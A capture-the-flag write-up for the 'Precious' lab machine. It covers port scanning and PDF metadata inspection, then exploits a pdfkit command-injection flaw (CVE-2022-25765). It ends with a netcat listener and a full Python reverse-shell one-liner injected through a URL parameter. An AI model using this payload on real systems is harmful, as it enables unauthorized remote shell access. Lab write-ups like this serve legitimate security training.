# Precious

## Summary

* [Info Gathering](#info-gathering)

## Info Gathering
First thing let's scan for the open ports:
```
[vecio@vecio ~]$ nmap 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 17:07 CEST
Nmap scan report for 10.10.11.189
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
```
We know that there are 2 services open: SSH service on the port 22 and an HTTP server on the default port 80.
We can check out the web server, so we add the IP address to the `/etc/hosts` file:
```
# Static table lookup for hostnames.
# See hosts(5) for details.
127.0.0.1	localhost
::1		localhost
127.0.1.1	vecio.localdomain	vecio

10.10.11.189	precious.htb
```
We can now access the web server on the browser using its domain or the IP address.

The only functionality present is to convert a web page into a PDF file.
We can test that out by starting a python web server and trying to get its PDF file.
```bash
python -m http.server
```
We can now enter our IP address followed by the port which the python web server has been opened: `http://10.10.16.79:8000/` and get its PDF file.
We can get more information by reading the file metadata using the `Exiftool`, so `exiftool file.pdf`:
```
ExifTool Version Number         : 12.50
File Name                       : edlaxwm1d82couplf7vpkkm9b4nyht3g.pdf
Directory                       : .
File Size                       : 29 kB
File Modification Date/Time     : 2023:03:26 17:12:58+02:00
File Access Date/Time           : 2023:03:26 17:13:44+02:00
File Inode Change Date/Time     : 2023:03:26 17:12:58+02:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6
```
We can see that the file has been created by the `pdfkit v0.8.6` ruby package.
We can use Google to search some known vulnerabilities about this package.

## Exploiting
We find [CVE-2022-25765: Command Injection](https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795) which allows us to inject a command if the URL is not sanitized.
Let's understand how the vulnerability works: an application could be vulnerable if it tries to render a URL that contains query string parameters with user input:
```ruby
PDFKit.new("http://example.com/?name=#{params[:name]}").to_pdf
```
If the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF:
```ruby
PDFKit.new("http://example.com/?name=#{'%20`sleep 5`'}").to_pdf
```
Calling `to_pdf` on the instance shows that the `sleep` command is indeed executing.
The `%20` is a URL-encoded space character, which allows the attacker to separate the injected command from the rest of the URL.
When PDFKit is used to generate a PDF from a URL, it first converts the URL into a command line argument string that is passed to a command line tool to generate the PDF.

So we can input the URL `http://10.10.16.79:8000/?name=%20&#x60sleep 5&#x60` to test the vulnerability and see that the operation takes 5 seconds to get the PDF file, so the website is vulnerable to this exploit.

## Reverse Shell
We can now execute a reverse shell script to get access to the server.
Let's start listening to connections on port `1234` using `Netcat`:
```
nc -lvnp 1234
```
now we can execute a python reverse shell using the exploit entering the following URL `http://10.10.16.79:8000/?name=%20\`export RHOST="10.10.16.79";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'\`` and get access to the server.
